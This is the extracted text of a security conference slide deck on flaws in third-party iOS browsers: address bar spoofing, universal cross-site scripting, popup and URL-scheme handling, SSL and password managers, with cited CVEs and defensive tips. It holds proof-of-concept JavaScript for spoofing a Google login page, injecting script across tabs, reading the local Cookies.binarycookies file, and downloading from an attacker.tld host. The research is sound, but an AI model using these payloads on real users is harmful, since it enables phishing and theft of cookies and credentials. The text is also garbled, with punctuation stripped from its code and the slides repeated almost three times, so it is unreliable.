UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
iOS Browsers
iOS Browsers
iOS Browser == Mobile Safari
bull iOS App Store Review GuidelinesbdquoApps that browse the web must use the iOS WebKit framework and WebKit Javascriptrdquo
Introduction iOS Browsers
WebView-based Proxy-rendering
iOS Third-Party Browsers
gt 60 browsers in App Store
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
iOS Browsers
iOS Browsers
iOS Browser == Mobile Safari
bull iOS App Store Review GuidelinesbdquoApps that browse the web must use the iOS WebKit framework and WebKit Javascriptrdquo
Introduction iOS Browsers
WebView-based Proxy-rendering
iOS Third-Party Browsers
gt 60 browsers in App Store
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView amp WKWebView
UIWebView API
bull loadRequest
bull loadHTMLStringbaseURL
bull loadDataMIMETypetextEncodingNamebaseURL
bull goBackgoForwardstopLoadingreload
bull request (read-only)
UIWebView amp WKWebView
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
